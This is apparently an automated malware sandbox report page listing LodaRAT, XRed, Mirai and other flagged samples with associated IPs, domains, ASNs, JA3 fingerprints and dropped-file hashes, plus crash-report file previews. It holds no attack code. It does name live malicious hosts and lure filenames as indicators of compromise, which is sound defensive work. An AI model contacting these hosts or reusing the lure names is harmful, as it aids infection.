                                                                                                                                      New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                        Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                          Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                            test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                              FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                  69.42.215.252Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  filedn.comOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  404.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  word.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 74.120.9.25
                                                                                                                                                  964232908.emlGet hashmaliciousMeshAgentBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  http://filedn.comGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  Kh25PMA7u8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  s-part-0017.t-0009.t-msedge.netOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  docx.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  KOGJZW.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 13.107.246.45
                                                                                                                                                  freedns.afraid.orgOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252

                                                                                                                                                  ASNs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  VOXILITYGBOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  test.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  sdlvrr.msiGet hashmaliciousLodaRATBrowse
                                                                                                                                                  • 172.111.138.100
                                                                                                                                                  SERVERS-COMUSOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.135.132
                                                                                                                                                  https://specificallycries.com/askyhgxe?stixna=48&refer=https%3A%2F%2Fwww.bodyvitalspa.com%2F&kw=%5B%22welcome%22%2C%22to%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%2C%22-%22%2C%22body%22%2C%22vital%22%2C%22foot%22%2C%22spa%22%5D&key=0b0f64ea0800e4174573a0e17513102f&scrWidth=1920&scrHeight=1080&tz=-5&v=24.12.6652&ship=&psid=www.bodyvitalspa.com,www.bodyvitalspa.com&sub3=invoke_layer&res=14.31&dev=r&adb=n&uuid=64597ca1-acf8-4c16-8774-db4c7f843adf%3A3%3A1&adb=nGet hashmaliciousAnonymous ProxyBrowse
                                                                                                                                                  • 172.240.108.76
                                                                                                                                                  nshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 209.192.241.158
                                                                                                                                                  nshkarm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 185.106.143.35
                                                                                                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 172.240.48.110
                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                  • 188.42.187.252
                                                                                                                                                  https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 188.42.189.197
                                                                                                                                                  https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 172.240.108.68
                                                                                                                                                  bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.109.170.83
                                                                                                                                                  AWKNET-LLCUSOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 69.42.215.252

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  xyxmml.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100
                                                                                                                                                  FGNEBI.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                  • 142.250.181.238
                                                                                                                                                  • 142.250.185.193
                                                                                                                                                  • 142.250.185.206
                                                                                                                                                  • 142.250.186.33
                                                                                                                                                  • 23.109.93.100

                                                                                                                                                  Dropped Files

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  C:\ProgramData\Synaptics\RCX915F.tmpOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                    valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                      New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                        Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                            222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                              Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                222.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                  C:\ProgramData\Synaptics\RCXC360.tmpOpen Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                    valyzt.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                      New PO - Supplier 16-12-2024-Pdf.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                        Purchase-Order.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                          hoaiuy.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                            222.msiGet hashmaliciousXRedBrowse
                                                                                                                                                                              Machine-PO.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                222.exeGet hashmaliciousLodaRAT, XRedBrowse

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):118
                                                                                                                                                                                  Entropy (8bit):3.5700810731231707
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                                                  MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                                                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                                                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                                                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_682ac5bed4b840282931a4392ce5ec24b1e3d19c_455b7b6e_c21edcef-4ea9-4f9f-bbc9-7e0ba4e37093\Report.wer

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                  Entropy (8bit):1.1374541137585301
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:in1VpsoI102k6PRDzJDzqjLOA/tccBFzuiFFZ24IO8EKDzy:syor2k6PRJqj8izuiFFY4IO8zy
                                                                                                                                                                                  MD5:3C70D219B1FB280B5BD8BA80CCD6C3D9
                                                                                                                                                                                  SHA1:D1D9A7B351427AC234E6C9D2C44339D5E198F446
                                                                                                                                                                                  SHA-256:E7FD3ADA9FF9CBDD5293B4E5ED3ED8DE5363F1398C68A4BD66C0A235B36C42AF
                                                                                                                                                                                  SHA-512:5DF569A34092F19809AB29D7EE2C8BE0E003FD04966A2D3184EBC94A5E7BE4B1878704796455DD2A04AD0D706262BFF4DBF3E42F15DEC2D1EEC572FD36D7E4F9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.0.2.9.4.7.2.5.1.7.8.4.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.0.2.9.4.7.6.7.6.7.8.3.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.1.e.d.c.e.f.-.4.e.a.9.-.4.f.9.f.-.b.b.c.9.-.7.e.0.b.a.4.e.3.7.0.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.6.f.1.5.3.c.-.9.2.6.8.-.4.b.c.6.-.8.d.b.8.-.0.9.d.4.f.4.c.a.7.5.4.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.9.8.-.0.0.0.1.-.0.0.1.4.-.5.7.2.3.-.6.3.b.2.a.8.5.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.6.c.2.b.a.a.7.2.e.a.5.d.0.8.b.6.5.8.3.8.9.3.b.0.1.0.0.1.e.5.4.0.2.1.3.f.4.a.a.f.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1394.tmp.dmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:51:13 2024, 0x1205a4 type
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2140174
                                                                                                                                                                                  Entropy (8bit):1.8268003819529854
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:K1Hyj7rbR7DLAUfbqdwRc6/B9eLAjxeXNspH4sx:QHOrbZD8Ufb3xmNs54O
                                                                                                                                                                                  MD5:D0EBF4BAD59A34180368F761CC851A40
                                                                                                                                                                                  SHA1:3947CB06130BDDC2A904A79387C7E31D5EA2B0F8
                                                                                                                                                                                  SHA-256:0A0EF2A3D5D73AC1F35B42D42815FD8B175B0BD658445803D55B13BC0AB7EB68
                                                                                                                                                                                  SHA-512:7754B010D0A5EC7F75903156015E11C16F6F3D837A27DE7510A85C85459AD8AF15C0F2B20EFAF07D7DAC0B1B4C8DAFE68B72B8616F4096A3039CF688C9E900E2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MDMP..a..... .......!{rg............D...............L.......$<..............T.......8...........T...............f............=...........?..............................................................................eJ......x@......GenuineIntel............T............{rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2315.tmp.WERInternalMetadata.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6358
                                                                                                                                                                                  Entropy (8bit):3.7264374227164043
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:R6l7wVeJ1xN6J5eYiBl5Qdprm89bUmsf4cm:R6lXJx6+Yol5QPUFfi
                                                                                                                                                                                  MD5:52B45A65DEDA9234CCC77BCC3D53D054
                                                                                                                                                                                  SHA1:C00751EBCDD17FC8FFC5699471A703B4088FA185
                                                                                                                                                                                  SHA-256:52C227A8454B8BD67CDD5EA8F0A961FF507BE985B3C88DDBFDCA6272FC766970
                                                                                                                                                                                  SHA-512:BE0A6FAFE999375C716C2E453EB54145F86799A42F82747D9F64F66B23A1D6984B502F0A19D509A2380142A46DD20BCEAE1894800B962FCDC6CCCFE285CF344E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.1.6.<./.P.i.

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2345.tmp.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4614
                                                                                                                                                                                  Entropy (8bit):4.484492519446292
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:cvIwWl8zsqJg77aI9CtWpW8VYirYm8M4JF4Fy+q8v5Yc5ZWd:uIjf4I7Mc7V5uJJLmZWd
                                                                                                                                                                                  MD5:D3FA407FD8A0E61FD86AAEED9373D93A
                                                                                                                                                                                  SHA1:E7A283AD5923E17B5BA2C46DF25424508593EF6F
                                                                                                                                                                                  SHA-256:A1FE6BE82A693456ABEF6D54900980BDA414EC935BED02886CA799DCA07D92DC
                                                                                                                                                                                  SHA-512:EBC7E9501246A5EBEA6E5A75E6D1892599516075B766C1BE4142989F2B82019CBFB0CB660BC2D6E5289F5206324A0CF4747E1461FB693B8153C51FAA51CFD74A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653873" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER6307.tmp.dmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:52:42 2024, 0x1205a4 type
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5112726
                                                                                                                                                                                  Entropy (8bit):2.132162103810636
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:eotw1EDtatrQuYZY4ma7ybVumeXuR6VmP4mg5:eoRJatrQVC5a7xVH
                                                                                                                                                                                  MD5:054E219A60179CC8DC465E63ADCFEA37
                                                                                                                                                                                  SHA1:D165364DD0A4E75BE387584CFEBDD021265FCAEE
                                                                                                                                                                                  SHA-256:A61ABD2583EFAAA30A8490D6DD77F6B6E0AFDBF694F2FDCD2ED5B285DCB14E00
                                                                                                                                                                                  SHA-512:E109ECF9CFE03BBA8D94B056AF5D15901C682F132CB2944589F1592018AB4E716DFDE3FB786622C278F885B11D151D784258C33897DB6D6B8C51D013986E1100
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MDMP..a..... .......z{rg.............V..........<....].....................T.......8...........T...........h....!L..........}..........................................................................................eJ..............GenuineIntel............T...........A{rg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER960E.tmp.WERInternalMetadata.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6304
                                                                                                                                                                                  Entropy (8bit):3.7127151744463047
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:RSIU6o7wVetb/x5A6W8dBMYiSWw/1Sg5aMQU189bPk9sff9ym:R6l7wVeJ/xO6OYiSWopD189bM9sffkm
